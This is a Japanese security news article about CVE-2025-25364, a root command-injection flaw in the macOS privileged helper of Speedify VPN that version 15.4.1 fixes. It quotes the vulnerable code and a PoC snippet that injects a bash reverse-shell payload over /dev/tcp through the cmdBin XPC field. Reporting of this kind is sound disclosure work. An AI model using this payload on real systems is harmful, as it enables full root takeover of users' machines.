Speedify VPN Vulnerability on macOS Exposes Users to System Takeover
2025/04/22 gbhackers — macOS 向け Speedify VPN アプリケーションに存在する、深刻なセキュリティ脆弱性 CVE-2025-25364 により、システム全体への侵害のリスクが、数百万のユーザーに対して生じている。この、Speedify の特権ヘルパー・ツールに存在する脆弱性は、SecureLayer7 の研究者たちにより発見された。この脆弱性の悪用に成功したローカルの攻撃者は、任意のコマンドを root 権限で実行し、影響を受けるシステムを完全に制御する可能性を手にする。

CVE-2025-25364:深刻なコマンド・インジェクション脆弱性
この問題の根本的な原因は、”me.connectify.SMJobBlessHelper” XPC サービスに存在する。このヘルパー・ツールは、昇格された root 権限で実行され、Speedify のシステム・レベルにおいてネットワーク操作を実行するものだ。
このサービスは、”/Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper” 経由で特権デーモンとしてインストールされ、Apple の XPC メッセージング・システムを介して、メインの Speedify アプリからコマンドを受信して処理するようにコンフィグされている。
| Aspect | Details |
| CVE ID | CVE-2025-25364 |
| Affected Product | Speedify VPN |
| Affected Version | 15.0.0 (macOS) |
| Patched Version | 15.4.1 |
| Component | me.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/) |
| Vulnerability Type | Command Injection |
最も懸念されるのは、受信 XPC メッセージ内の cmdPath/cmdBin フィールドの入力検証が適切に行われていないことで、ローカルの攻撃者に対して、悪意のペイロード作成が許される可能性である。
これらのフィールドは、サニタイズ処理が行われない状態で、コマンド実行ロジックにダイレクトに埋め込まれているため、攻撃者挿入する任意のシェル・コマンドが、ヘルパー・ツールの root 権限で実行される。
この脆弱性のコアとなるのは、以下の3つの関数である:
- XPC Message Handler:受信した XPC メッセージを受け入れて解析し、”runSpeedify” リクエストを含むメッセージを検証せずに、起動ハンドラに受け渡す。
- _handleLaunchSpeedifyMsg:入力データから cmdPath/cmdBin をダイレクトに抽出し、プログラムの実行を開始する。
- _RunSystemCmd:これらのフィールドからシェル・コマンドを構築し、system() を呼び出して実行する。以下の行が示すのは、このインジェクションのリスクである。
rax = asprintf(&var_38, “codesign -v -R=\”certificate leaf[subject.CN] = \”%s\” and anchor apple generic\” \”%s\””, “…”, rcx);
“; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo” のような文字列を、cmdBin または cmdPath に設定する脅威アクターは、外部サーバへのルート・シェル接続を開くことが可能となる。
XPC API を使用して脆弱なヘルパーに接続し、細工されたペイロードを送信するための、Objective-C で記述された PoC エクスプロイトを、研究者たちが公開している。
そのペイロードにより、root 権限での任意のコード実行がトリガーされ、リバース・シェルの生成などが実施される。関連するスニペットを、以下に示す。
xpc_dictionary_set_string(message, "cmdPath", "/tmp");
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);
この脆弱性の影響は、深刻なものとなる。ローカル・アクセス権を持つ攻撃者は、完全なルート権限の取得/機密ファイルの変更/永続的なマルウェアのインストール/データの窃取といった可能性を手にする。
Speedify VPN ユーザーの多くは、このアプリをプライバシー保護において利用しているため、この脆弱性により、広大なユーザー・ベースのセキュリティが脅かされる可能性がある。
すでに Speedify は、バージョン 15.4.1 をリリースし、この脆弱性に対処している。このバージョンでは、ヘルパー・ツールの完全な書き換えと、より厳格な入力検証に加えて、安全が確保されない XPC 処理が削除されている。Speedify ユーザーに強く推奨されるのは、最新バージョンへと速やかに移行し、このリスクを解消することである。
このインシデントが浮き彫りにするのは、すべての特権コードにおける、厳格な入力検証の重要性である。
macOS 向け Speedify VPN App の脆弱性が FIX とのことですが、すでに PoC エクスプロイトが提供されています。ユーザーの皆さんは、アップデートを忘れないよう、ご注意ください。よろしければ、以下の関連記事も、VPN で検索と併せて ご参照ください。
2025/02/24:VPN の正しい使い方:安全なリモートワーク
2025/02/08:VPN デバイスなどを標的とするブルートフォースが発生
2025/02/01:一般的なユーザー向け Top VPN の選び方
You must be logged in to post a comment.